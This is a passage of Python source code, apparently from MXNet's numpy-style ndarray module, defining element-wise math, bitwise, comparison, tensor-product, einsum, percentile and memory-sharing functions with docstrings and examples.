    raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def arctan2(x1, x2, out=None, **kwargs):
    r"""
    Element-wise arc tangent of ``x1/x2`` choosing the quadrant correctly.

    The quadrant (i.e., branch) is chosen so that ``arctan2(x1, x2)``
    is the signed angle in radians between the ray ending at the
    origin and passing through the point (1,0), and the ray ending at
    the origin and passing through the point (`x2`, `x1`). Note the
    role reversal: the "`y`-coordinate" is the first function
    parameter, the "`x`-coordinate" is the second. By IEEE convention
    this function is defined for `x2` = +/-0 and for either or both of
    `x1` and `x2` = +/-inf.

    This function is not defined for complex-valued arguments.

    Parameters
    ----------
    x1 : ndarray or scalar
        `y`-coordinates.
    x2 : ndarray or scalar
        `x`-coordinates. `x2` must be broadcastable to match the shape
        of `x1` or vice versa.
    out : ndarray or None, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Array of angles in radians, in the range ``[-pi, pi]``. This
        is a scalar if `x1` and `x2` are scalars.

    Notes
    -----
    *arctan2* is identical to the `atan2` function of the underlying
    C library, including its special values for zero and infinite
    arguments (see ISO/IEC 9899:1999, "Programming language C.").
    This function differs from the original numpy.arctan2 in the
    following aspects:
    - Only support float16, float32 and float64.

    Examples
    --------
    Consider four points in different quadrants:
    >>> x = np.array([-1, +1, +1, -1])
    >>> y = np.array([-1, -1, +1, +1])
    >>> np.arctan2(y, x) * 180 / np.pi
    array([-135.,  -45.,   45.,  135.])
    >>> x = np.array([1, -1])
    >>> y = np.array([0, 0])
    >>> np.arctan2(x, y)
    array([ 1.5707964, -1.5707964])
    """
    result = _ufunc_helper(x1, x2, _npi.arctan2, _np.arctan2,
                           _npi.arctan2_scalar, _npi.rarctan2_scalar, out=out)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def hypot(x1, x2, out=None, **kwargs):
    r"""
    Given the "legs" of a right triangle, return its hypotenuse.

    Equivalent to ``sqrt(x1**2 + x2**2)``, element-wise. If `x1` or
    `x2` is scalar_like (i.e., unambiguously cast-able to a scalar
    type), it is broadcast for use with each element of the other
    argument.

    Parameters
    ----------
    x1, x2 : ndarray
        Leg of the triangle(s).
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    z : ndarray
        The hypotenuse of the triangle(s).
        This is a scalar if both `x1` and `x2` are scalars.

    Notes
    -----
    This function differs from the original numpy.hypot in the
    following aspects:
    - Only support float16, float32 and float64.

    Examples
    --------
    >>> np.hypot(3*np.ones((3, 3)), 4*np.ones((3, 3)))
    array([[ 5.,  5.,  5.],
           [ 5.,  5.,  5.],
           [ 5.,  5.,  5.]])
    >>> np.hypot(3*np.ones((3, 3)), [4])
    array([[ 5.,  5.,  5.],
           [ 5.,  5.,  5.],
           [ 5.,  5.,  5.]])
    """
    result = _ufunc_helper(x1, x2, _npi.hypot, _np.hypot,
                           _npi.hypot_scalar, None, out)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_and(x1, x2, out=None, **kwargs):
    r"""
    Compute the bit-wise AND of two arrays element-wise.
    Parameters
    ----------
    x1, x2 : ndarray or scalar
        Only integer and boolean types are handled. If x1.shape != x2.shape,
        they must be broadcastable to a common shape (which becomes the shape of the output).
    out : ndarray, optional
        A location into which the result is stored. If provided, it must have a shape that the
        inputs broadcast to. If not provided or None, a freshly-allocated array is returned.
    Returns
    -------
    out : ndarray
        Result.
    Examples
    --------
    >>> np.bitwise_and(13, 17)
    1
    >>> np.bitwise_and(14, 13)
    12
    >>> np.bitwise_and(np.array([14,3], dtype='int32'), 13)
    array([12, 1], dtype=int32)
    >>> np.bitwise_and(np.array([11,7], dtype='int32'), np.array([4,25], dtype='int32'))
    array([0, 1], dtype=int32)
    >>> np.bitwise_and(np.array([2,5,255], dtype='int32'), np.array([3,14,16], dtype='int32'))
    array([ 2,  4, 16], dtype=int32)
    >>> np.bitwise_and(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool'))
    array([False,  True])
    """
    return _ufunc_helper(x1, x2, _npi.bitwise_and, _np.bitwise_and, _npi.bitwise_and_scalar, None, out)
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_xor(x1, x2, out=None, **kwargs):
    r"""
    Compute the bit-wise XOR of two arrays element-wise.

    Parameters
    ----------
    x1, x2 : ndarray or scalar
        Only integer and boolean types are handled. If
        ``x1.shape != x2.shape``, they must be broadcastable to a
        common shape (which becomes the shape of the output).
    out : ndarray, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or None, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray
        Result.

    Examples
    --------
    >>> np.bitwise_xor(13, 17)
    28
    >>> np.bitwise_xor(31, 5)
    26
    >>> np.bitwise_xor(np.array([31,3], dtype='int32'), 5)
    array([26,  6])
    >>> np.bitwise_xor(np.array([31,3], dtype='int32'), np.array([5,6], dtype='int32'))
    array([26,  5])
    >>> np.bitwise_xor(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool'))
    array([ True, False])
    """
    result = _ufunc_helper(x1, x2, _npi.bitwise_xor, _np.bitwise_xor,
                           _npi.bitwise_xor_scalar, None, out)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def bitwise_or(x1, x2, out=None, **kwargs):
    r"""
    Compute the bit-wise OR of two arrays element-wise.

    Parameters
    ----------
    x1, x2 : ndarray or scalar
        Only integer and boolean types are handled. If
        ``x1.shape != x2.shape``, they must be broadcastable to a
        common shape (which becomes the shape of the output).
    out : ndarray, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or None, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray
        Result.

    Examples
    --------
    >>> np.bitwise_or(13, 17)
    29
    >>> np.bitwise_or(31, 5)
    31
    >>> np.bitwise_or(np.array([31,3], dtype='int32'), 5)
    array([31,  7])
    >>> np.bitwise_or(np.array([31,3], dtype='int32'), np.array([5,6], dtype='int32'))
    array([31,  7])
    >>> np.bitwise_or(np.array([True, True], dtype='bool'), np.array([False, True], dtype='bool'))
    array([ True,  True])
    """
    result = _ufunc_helper(x1, x2, _npi.bitwise_or, _np.bitwise_or,
                           _npi.bitwise_or_scalar, None, out)
    return result
@set_module('mxnet.ndarray.numpy')
@wrap_np_binary_func
def ldexp(x1, x2, out=None, **kwargs):
    """
    Returns x1 * 2**x2, element-wise.

    The mantissas `x1` and twos exponents `x2` are used to construct
    floating point numbers ``x1 * 2**x2``.

    Parameters
    ----------
    x1 : ndarray or scalar
        Array of multipliers.
    x2 : ndarray or scalar, int
        Array of twos exponents.
    out : ndarray, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not, a
        freshly-allocated array is returned.

    Returns
    -------
    y : ndarray or scalar
        The result of ``x1 * 2**x2``.
        This is a scalar if both `x1` and `x2` are scalars.

    Notes
    -----
    Complex dtypes are not supported, they will raise a TypeError.
    Different from numpy, we allow x2 to be float besides int.
    `ldexp` is useful as the inverse of `frexp`, if used by itself it
    is more clear to simply use the expression ``x1 * 2**x2``.

    Examples
    --------
    >>> np.ldexp(5, np.arange(4))
    array([ 5., 10., 20., 40.])
    """
    result = _ufunc_helper(x1, x2, _npi.ldexp, _np.ldexp,
                           _npi.ldexp_scalar, _npi.rldexp_scalar, out)
    return result
@set_module('mxnet.ndarray.numpy')
def inner(a, b):
    r"""
    Inner product of two arrays.

    Ordinary inner product of vectors for 1-D arrays (without complex
    conjugation), in higher dimensions a sum product over the last
    axes:

        np.inner(a, b) = np.tensordot(a, b, axes=(-1,-1))

    Parameters
    ----------
    a, b : ndarray
        If `a` and `b` are nonscalar, their last dimensions must match.

    Returns
    -------
    out : ndarray
        ``out.shape = a.shape[:-1] + b.shape[:-1]``

    Raises
    ------
    ValueError
        If the last dimension of `a` and `b` has different size.

    See Also
    --------
    tensordot : Sum products over arbitrary axes.
    dot : Generalised matrix product, using second last dimension of `b`.
    einsum : Einstein summation convention.

    Examples
    --------
    Ordinary inner product for vectors:
    >>> a = np.array([1,2,3])
    >>> b = np.array([0,1,0])
    >>> np.inner(a, b)
    2
    A multidimensional example:
    >>> a = np.arange(24).reshape((2,3,4))
    >>> b = np.arange(4)
    >>> np.inner(a, b)
    array([[ 14,  38,  62],
           [ 86, 110, 134]])
    """
    # Inner product contracts the trailing axis of both operands.
    contraction_axes = [-1, -1]
    return tensordot(a, b, contraction_axes)
@set_module('mxnet.ndarray.numpy')
def outer(a, b):
    r"""
    Compute the outer product of two vectors.

    Given two vectors, ``a = [a0, a1, ..., aM]`` and
    ``b = [b0, b1, ..., bN]``, the outer product [1]_ is::

      [[a0*b0  a0*b1 ... a0*bN ]
       [a1*b0    .
       [ ...          .
       [aM*b0            aM*bN ]]

    Parameters
    ----------
    a : (M,) ndarray
        First input vector. Input is flattened if not already
        1-dimensional.
    b : (N,) ndarray
        Second input vector. Input is flattened if not already
        1-dimensional.

    Returns
    -------
    out : (M, N) ndarray
        ``out[i, j] = a[i] * b[j]``

    See also
    --------
    inner
    einsum : ``einsum('i,j->ij', a.ravel(), b.ravel())`` is the equivalent.

    References
    ----------
    .. [1] : G. H. Golub and C. F. Van Loan, *Matrix Computations*, 3rd
             ed., Baltimore, MD, Johns Hopkins University Press, 1996,
             pg. 8.

    Examples
    --------
    >>> rl = np.outer(np.ones((5,)), np.linspace(-2, 2, 5))
    >>> rl
    array([[-2., -1.,  0.,  1.,  2.],
           [-2., -1.,  0.,  1.,  2.],
           [-2., -1.,  0.,  1.,  2.],
           [-2., -1.,  0.,  1.,  2.],
           [-2., -1.,  0.,  1.,  2.]])
    """
    # Flatten both operands, then a zero-axis tensordot gives the
    # full outer product.
    vec_a = a.flatten()
    vec_b = b.flatten()
    return tensordot(vec_a, vec_b, 0)
@set_module('mxnet.ndarray.numpy')
def vdot(a, b):
    r"""
    Return the dot product of two vectors.

    Note that `vdot` handles multidimensional arrays differently than
    `dot`: it does *not* perform a matrix product, but flattens input
    arguments to 1-D vectors first. Consequently, it should only be
    used for vectors.

    Parameters
    ----------
    a : ndarray
        First argument to the dot product.
    b : ndarray
        Second argument to the dot product.

    Returns
    -------
    output : ndarray
        Dot product of `a` and `b`.

    See Also
    --------
    dot : Return the dot product without using the complex conjugate
        of the first argument.

    Examples
    --------
    Note that higher-dimensional arrays are flattened!
    >>> a = np.array([[1, 4], [5, 6]])
    >>> b = np.array([[4, 1], [2, 2]])
    >>> np.vdot(a, b)
    30
    >>> np.vdot(b, a)
    30
    >>> 1*4 + 4*1 + 5*2 + 6*2
    30
    """
    # Flatten both inputs and contract the single remaining axis.
    vec_a = a.flatten()
    vec_b = b.flatten()
    return tensordot(vec_a, vec_b, 1)
@set_module('mxnet.ndarray.numpy')
def equal(x1, x2, out=None):
    """
    Return (x1 == x2) element-wise.

    Parameters
    ----------
    x1, x2 : ndarrays or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be
        broadcastable to a common shape (which becomes the shape of
        the output).
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Output array of type bool, element-wise comparison of `x1`
        and `x2`. This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    not_equal, greater_equal, less_equal, greater, less

    Examples
    --------
    >>> np.equal(np.ones((2, 1)), np.zeros((1, 3)))
    array([[False, False, False],
           [False, False, False]])
    >>> np.equal(1, np.ones(1))
    array([ True])
    """
    result = _ufunc_helper(x1, x2, _npi.equal, _np.equal,
                           _npi.equal_scalar, None, out)
    return result
@set_module('mxnet.ndarray.numpy')
def not_equal(x1, x2, out=None):
    """
    Return (x1 != x2) element-wise.

    Parameters
    ----------
    x1, x2 : ndarrays or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be
        broadcastable to a common shape (which becomes the shape of
        the output).
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Output array of type bool, element-wise comparison of `x1`
        and `x2`. This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    equal, greater, greater_equal, less, less_equal

    Examples
    --------
    >>> np.not_equal(np.ones((2, 1)), np.zeros((1, 3)))
    array([[ True,  True,  True],
           [ True,  True,  True]])
    >>> np.not_equal(1, np.ones(1))
    array([False])
    """
    result = _ufunc_helper(x1, x2, _npi.not_equal, _np.not_equal,
                           _npi.not_equal_scalar, None, out)
    return result
@set_module('mxnet.ndarray.numpy')
def greater(x1, x2, out=None):
    """
    Return the truth value of (x1 > x2) element-wise.

    Parameters
    ----------
    x1, x2 : ndarrays or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be
        broadcastable to a common shape (which becomes the shape of
        the output).
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Output array of type bool, element-wise comparison of `x1`
        and `x2`. This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    equal, not_equal, greater_equal, less, less_equal

    Examples
    --------
    >>> np.greater(np.ones((2, 1)), np.zeros((1, 3)))
    array([[ True,  True,  True],
           [ True,  True,  True]])
    >>> np.greater(1, np.ones(1))
    array([False])
    """
    # When the scalar appears on the left, "scalar > array" is
    # rewritten by _ufunc_helper as "array < scalar", hence the
    # reflected less_scalar kernel.
    result = _ufunc_helper(x1, x2, _npi.greater, _np.greater,
                           _npi.greater_scalar, _npi.less_scalar, out)
    return result
@set_module('mxnet.ndarray.numpy')
def less(x1, x2, out=None):
    """
    Return the truth value of (x1 < x2) element-wise.

    Parameters
    ----------
    x1, x2 : ndarrays or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be
        broadcastable to a common shape (which becomes the shape of
        the output).
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Output array of type bool, element-wise comparison of `x1`
        and `x2`. This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    equal, not_equal, greater, greater_equal, less_equal

    Examples
    --------
    >>> np.less(np.ones((2, 1)), np.zeros((1, 3)))
    array([[False, False, False],
           [False, False, False]])
    >>> np.less(1, np.ones(1))
    array([False])
    """
    # "scalar < array" is rewritten as "array > scalar", hence the
    # reflected greater_scalar kernel.
    result = _ufunc_helper(x1, x2, _npi.less, _np.less,
                           _npi.less_scalar, _npi.greater_scalar, out)
    return result
@set_module('mxnet.ndarray.numpy')
def greater_equal(x1, x2, out=None):
    """
    Return the truth value of (x1 >= x2) element-wise.

    Parameters
    ----------
    x1, x2 : ndarrays or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be
        broadcastable to a common shape (which becomes the shape of
        the output).
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Output array of type bool, element-wise comparison of `x1`
        and `x2`. This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    equal, not_equal, greater, less, less_equal

    Examples
    --------
    >>> np.greater_equal(np.ones((2, 1)), np.zeros((1, 3)))
    array([[ True,  True,  True],
           [ True,  True,  True]])
    >>> np.greater_equal(1, np.ones(1))
    array([ True])
    """
    # "scalar >= array" is rewritten as "array <= scalar", hence the
    # reflected less_equal_scalar kernel.
    result = _ufunc_helper(x1, x2, _npi.greater_equal, _np.greater_equal,
                           _npi.greater_equal_scalar, _npi.less_equal_scalar, out)
    return result
@set_module('mxnet.ndarray.numpy')
def less_equal(x1, x2, out=None):
    """
    Return the truth value of (x1 <= x2) element-wise.

    Parameters
    ----------
    x1, x2 : ndarrays or scalars
        Input arrays. If ``x1.shape != x2.shape``, they must be
        broadcastable to a common shape (which becomes the shape of
        the output).
    out : ndarray, None, or tuple of ndarray and None, optional
        A location into which the result is stored. If provided, it
        must have a shape that the inputs broadcast to. If not
        provided or `None`, a freshly-allocated array is returned.

    Returns
    -------
    out : ndarray or scalar
        Output array of type bool, element-wise comparison of `x1`
        and `x2`. This is a scalar if both `x1` and `x2` are scalars.

    See Also
    --------
    equal, not_equal, greater, greater_equal, less

    Examples
    --------
    >>> np.less_equal(np.ones((2, 1)), np.zeros((1, 3)))
    array([[False, False, False],
           [False, False, False]])
    >>> np.less_equal(1, np.ones(1))
    array([ True])
    """
    # "scalar <= array" is rewritten as "array >= scalar", hence the
    # reflected greater_equal_scalar kernel.
    result = _ufunc_helper(x1, x2, _npi.less_equal, _np.less_equal,
                           _npi.less_equal_scalar, _npi.greater_equal_scalar, out)
    return result
@set_module('mxnet.ndarray.numpy')
def rot90(m, k=1, axes=(0, 1)):
    """
    Rotate an array by 90 degrees in the plane specified by axes.
    Rotation direction is from the first towards the second axis.
    Parameters
    ----------
    m : ndarray
        Array of two or more dimensions.
    k : integer
        Number of times the array is rotated by 90 degrees.
    axes: (2,) array_like
        The array is rotated in the plane defined by the axes.
        Axes must be different.
    Returns
    -------
    y : ndarray
        A rotated view of `m`.
    Notes
    -----
    rot90(m, k=1, axes=(1,0)) is the reverse of rot90(m, k=1, axes=(0,1))
    rot90(m, k=1, axes=(1,0)) is equivalent to rot90(m, k=-1, axes=(0,1))
    Examples
    --------
    >>> m = np.array([[1,2],[3,4]], 'int')
    >>> m
    array([[1, 2],
           [3, 4]], dtype=int64)
    >>> np.rot90(m)
    array([[2, 4],
           [1, 3]], dtype=int64)
    >>> np.rot90(m, 2)
    array([[4, 3],
           [2, 1]], dtype=int64)
    >>> m = np.arange(8).reshape((2,2,2))
    >>> np.rot90(m, 1, (1,2))
    array([[[1., 3.],
            [0., 2.]],
           [[5., 7.],
            [4., 6.]]])
    """
    return _npi.rot90(m, k=k, axes=axes)
@set_module('mxnet.ndarray.numpy')
def einsum(*operands, **kwargs):
    r"""
    einsum(subscripts, *operands, out=None, optimize=False)

    Evaluate the Einstein summation convention on the operands.

    The subscripts string is a comma-separated list of subscript labels, one
    group per operand; a repeated label is summed over, so
    ``np.einsum('i,i', a, b)`` is the inner product and
    ``np.einsum('ij,jk', a, b)`` is matrix multiplication. In *explicit* mode
    an output specification after ``->`` controls which labels survive, e.g.
    ``np.einsum('ii->i', a)`` extracts the diagonal and
    ``np.einsum('ij->i', a)`` sums over the last axis. An ellipsis ``...``
    stands for any number of broadcast dimensions.

    Parameters
    ----------
    subscripts : str
        Specifies the subscripts for summation as comma separated list of
        subscript labels. An implicit (classical Einstein summation)
        calculation is performed unless the explicit indicator '->' is
        included as well as subscript labels of the precise output form.
    operands : list of ndarray
        These are the arrays for the operation.
    out : ndarray, optional
        If provided, the calculation is done into this array.
    optimize : {False, True}, optional
        Controls if intermediate optimization should occur. No optimization
        will occur if False. Defaults to False. A 'greedy' contraction-order
        search is used when True; 'optimal' is not supported.

    Returns
    -------
    output : ndarray
        The calculation based on the Einstein summation convention.

    Notes
    -----
    This function differs from the original `numpy.einsum
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.einsum.html>`_ in
    the following way(s):

    - Does not support 'optimal' strategy
    - Does not support the alternative subscript like
      `einsum(op0, sublist0, op1, sublist1, ..., [sublistout])`
    - Does not produce view in any cases

    Examples
    --------
    >>> a = np.arange(25).reshape(5,5)
    >>> b = np.arange(5)
    >>> np.einsum('ii', a)          # trace
    array(60.)
    >>> np.einsum('ii->i', a)       # diagonal
    array([ 0.,  6., 12., 18., 24.])
    >>> np.einsum('ij->i', a)       # row sums
    array([ 10.,  35.,  60.,  85., 110.])
    >>> np.einsum('i,i', b, b)      # inner product
    array(30.)
    >>> np.einsum('ij,j', a, b)     # matrix-vector product
    array([ 30.,  80., 130., 180., 230.])
    """
    # Peel off the recognised keyword options first; any other keyword
    # arguments are silently ignored, matching the historical behaviour.
    out = kwargs.pop('out', None)
    optimize_flag = int(kwargs.pop('optimize', False))  # bool -> 0/1 for the backend
    subscripts, array_args = operands[0], operands[1:]
    return _npi.einsum(*array_args, subscripts=subscripts, out=out, optimize=optimize_flag)
@set_module('mxnet.ndarray.numpy')
def nonzero(a):
    """
    Return the indices of the elements that are non-zero.

    Returns a tuple of arrays, one for each dimension of `a`, containing the
    indices of the non-zero elements in that dimension. The values in `a`
    are always returned in row-major, C-style order. To group the indices by
    element rather than by dimension, use `argwhere` instead.

    Parameters
    ----------
    a : ndarray
        Input array.

    Returns
    -------
    tuple_of_arrays : tuple
        Indices of elements that are non-zero, one index array per dimension
        of `a`.

    See Also
    --------
    ndarray.nonzero :
        Equivalent ndarray method.

    Notes
    -----
    While the nonzero values can be obtained with ``a[nonzero(a)]``, it is
    recommended to use ``x[x.astype(bool)]`` or ``x[x != 0]`` instead, which
    will correctly handle 0-d arrays.

    Examples
    --------
    >>> x = np.array([[3, 0, 0], [0, 4, 0], [5, 6, 0]])
    >>> np.nonzero(x)
    (array([0, 1, 2, 2], dtype=int64), array([0, 1, 0, 1], dtype=int64))
    >>> x[np.nonzero(x)]
    array([3, 4, 5, 6])

    A common use is to find the indices where a condition holds; boolean
    arrays treat False as 0:

    >>> a = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]], dtype=np.int32)
    >>> np.nonzero(a > 3)
    (array([1, 1, 1, 2, 2, 2], dtype=int64), array([0, 1, 2, 0, 1, 2], dtype=int64))
    >>> a[np.nonzero(a > 3)]
    array([4, 5, 6, 7, 8, 9], dtype=int32)
    >>> (a > 3).nonzero()
    (array([1, 1, 1, 2, 2, 2], dtype=int64), array([0, 1, 2, 0, 1, 2], dtype=int64))
    """
    # The backend op returns one row per non-zero element; transposing gives
    # one row per dimension, which we unpack into the numpy-style tuple.
    transposed = _npi.nonzero(a).transpose()
    return tuple(transposed[dim] for dim in range(len(transposed)))
@set_module('mxnet.ndarray.numpy')
def percentile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False):  # pylint: disable=too-many-arguments
    """
    Compute the q-th percentile of the data along the specified axis.

    Returns the q-th percentile(s) of the array elements.

    Parameters
    ----------
    a : ndarray
        Input array.
    q : ndarray or scalar
        Percentile or sequence of percentiles to compute.
    axis : {int, tuple of int, None}, optional
        Axis or axes along which the percentiles are computed. The default is
        to compute the percentile(s) along a flattened version of the array.
    out : ndarray, optional
        Alternative output array in which to place the result. It must have
        the same shape and buffer length as the expected output, but the type
        (of the output) will be cast if necessary.
    overwrite_input : bool, optional (Not supported yet)
        If True, then allow the input array a to be modified by intermediate
        calculations, to save memory. Passing any non-None value raises
        NotImplementedError.
    interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
        Interpolation method used when the desired percentile lies between
        two data points i < j:
        'linear': i + (j - i) * fraction, where fraction is the fractional
        part of the index surrounded by i and j.
        'lower': i. 'higher': j. 'nearest': i or j, whichever is nearest.
        'midpoint': (i + j) / 2.
    keepdims : bool, optional
        If True, the reduced axes are left in the result as dimensions with
        size one so the result broadcasts correctly against `a`.

    Returns
    -------
    percentile : scalar or ndarray
        Output array.

    Raises
    ------
    NotImplementedError
        If `overwrite_input` is not None.

    Examples
    --------
    >>> a = np.array([[10, 7, 4], [3, 2, 1]])
    >>> np.percentile(a, np.array(50))
    array(3.5)
    >>> np.percentile(a, np.array(50), axis=0)
    array([6.5, 4.5, 2.5])
    >>> np.percentile(a, np.array(50), axis=1, keepdims=True)
    array([[7.],
           [2.]])
    """
    if overwrite_input is not None:
        raise NotImplementedError('overwrite_input is not supported yet')
    if not isinstance(q, numeric_types):
        # q supplied as an ndarray of percentiles: pass it positionally.
        return _npi.percentile(a, q, axis=axis, interpolation=interpolation,
                               keepdims=keepdims, q_scalar=None, out=out)
    # q supplied as a plain Python scalar: route it through q_scalar.
    return _npi.percentile(a, axis=axis, interpolation=interpolation,
                           keepdims=keepdims, q_scalar=q, out=out)
@set_module('mxnet.ndarray.numpy')
def quantile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False):  # pylint: disable=too-many-arguments
    """
    Compute the q-th quantile of the data along the specified axis.

    Parameters
    ----------
    a : ndarray
        Input array or object that can be converted to an array.
    q : ndarray or scalar
        Quantile or sequence of quantiles to compute, which must be between
        0 and 1 inclusive.
    axis : {int, tuple of int, None}, optional
        Axis or axes along which the quantiles are computed. The default is
        to compute the quantile(s) along a flattened version of the array.
    out : ndarray, optional
        Alternative output array in which to place the result. It must have
        the same shape and buffer length as the expected output, but the type
        (of the output) will be cast if necessary.
    overwrite_input : bool, optional (Not supported yet)
        Passing any non-None value raises NotImplementedError.
    interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
        Interpolation method used when the desired quantile lies between two
        data points i < j:
        linear: i + (j - i) * fraction, where fraction is the fractional part
        of the index surrounded by i and j.
        lower: i. higher: j. nearest: i or j, whichever is nearest.
        midpoint: (i + j) / 2.
    keepdims : bool, optional
        If True, the reduced axes are left in the result as dimensions with
        size one so the result broadcasts correctly against `a`.

    Returns
    -------
    quantile : ndarray
        If q is a single quantile and axis=None, the result is a scalar.
        If multiple quantiles are given, the first axis of the result
        corresponds to the quantiles; the other axes are those remaining
        after the reduction of `a`. If out is specified, that array is
        returned instead.

    Raises
    ------
    NotImplementedError
        If `overwrite_input` is not None.

    See also
    --------
    mean

    Notes
    -----
    Given a vector V of length N, the q-th quantile of V is the value q of
    the way from the minimum to the maximum in a sorted copy of V. This
    function equals the median for q=0.5, the minimum for q=0.0 and the
    maximum for q=1.0.

    This function differs from the original `numpy.quantile
    <https://numpy.org/devdocs/reference/generated/numpy.quantile.html>`_ in
    the following aspects:

    - q must be ndarray type even if it is a scalar
    - do not support overwrite_input

    Examples
    --------
    >>> a = np.array([[10, 7, 4], [3, 2, 1]])
    >>> q = np.array(0.5)
    >>> np.quantile(a, q)
    array(3.5)
    >>> np.quantile(a, q, axis=0)
    array([6.5, 4.5, 2.5])
    >>> np.quantile(a, q, axis=1, keepdims=True)
    array([[7.],
           [2.]])
    """
    if overwrite_input is not None:
        raise NotImplementedError('overwrite_input is not supported yet')
    # Quantiles in [0, 1] are rescaled to percentiles and delegated to the
    # shared percentile backend op.
    if not isinstance(q, numeric_types):
        return _npi.percentile(a, q * 100, axis=axis, interpolation=interpolation,
                               keepdims=keepdims, q_scalar=None, out=out)
    return _npi.percentile(a, axis=axis, interpolation=interpolation,
                           keepdims=keepdims, q_scalar=q * 100, out=out)
@set_module('mxnet.ndarray.numpy')
def shares_memory(a, b, max_work=None):
    """
    Determine if two arrays share memory

    Parameters
    ----------
    a, b : ndarray
        Input arrays
    max_work : optional
        Dummy argument, ignored (kept for numpy API compatibility).

    Returns
    -------
    out : bool

    See Also
    --------
    may_share_memory

    Examples
    --------
    >>> np.shares_memory(np.array([1,2]), np.array([5,8,9]))
    False

    This function differs from the original `numpy.shares_memory
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.shares_memory.html>`_ in
    the following way(s):

    - Does not support `max_work`, it is a dummy argument
    - Actually it is same as `may_share_memory` in MXNet DeepNumPy
    """
    # Both shares_memory and may_share_memory delegate to the same backend op.
    return _npi.share_memory(a, b).item()
@set_module('mxnet.ndarray.numpy')
def may_share_memory(a, b, max_work=None):
    """
    Determine if two arrays might share memory

    A return of True does not necessarily mean that the two arrays share any
    element; it just means that they *might*. Only the memory bounds of a
    and b are checked by default.

    Parameters
    ----------
    a, b : ndarray
        Input arrays
    max_work : optional
        Dummy argument, ignored (kept for numpy API compatibility).

    Returns
    -------
    out : bool

    See Also
    --------
    shares_memory

    Examples
    --------
    >>> np.may_share_memory(np.array([1,2]), np.array([5,8,9]))
    False
    >>> x = np.zeros([3, 4])
    >>> np.may_share_memory(x[:,0], x[:,1])
    True

    This function differs from the original `numpy.may_share_memory
    <https://docs.scipy.org/doc/numpy/reference/generated/numpy.may_share_memory.html>`_ in
    the following way(s):

    - Does not support `max_work`, it is a dummy argument
    - Actually it is same as `shares_memory` in MXNet DeepNumPy
    """
    # Same backend op as shares_memory; extract the Python scalar result.
    overlap = _npi.share_memory(a, b)
    return overlap.item()
@set_module('mxnet.ndarray.numpy')
def diff(a, n=1, axis=-1, prepend=None, append=None):  # pylint: disable=redefined-outer-name
    r"""
    Calculate the n-th discrete difference along the given axis.

    Parameters
    ----------
    a : ndarray
        Input array
    n : int, optional
        The number of times values are differenced. If zero, the input is
        returned as-is.
    axis : int, optional
        The axis along which the difference is taken, default is the last axis.
    prepend, append : ndarray, optional
        Not supported yet; passing any value raises NotImplementedError.

    Returns
    -------
    diff : ndarray
        The n-th differences. The shape of the output is the same as `a`
        except along `axis` where the dimension is smaller by `n`. The type
        of the output is the same as the type of the difference between any
        two elements of `a`.

    Raises
    ------
    NotImplementedError
        If `prepend` or `append` is given.

    Examples
    --------
    >>> x = np.array([1, 2, 4, 7, 0])
    >>> np.diff(x)
    array([ 1,  2,  3, -7])
    >>> np.diff(x, n=2)
    array([  1,   1, -10])
    >>> x = np.array([[1, 3, 6, 10], [0, 5, 6, 8]])
    >>> np.diff(x)
    array([[2, 3, 4],
           [5, 1, 2]])
    >>> np.diff(x, axis=0)
    array([[-1,  2,  0, -2]])

    Notes
    -----
    Optional inputs `prepend` and `append` are not supported yet
    """
    # Compare against None explicitly: the previous truth-test
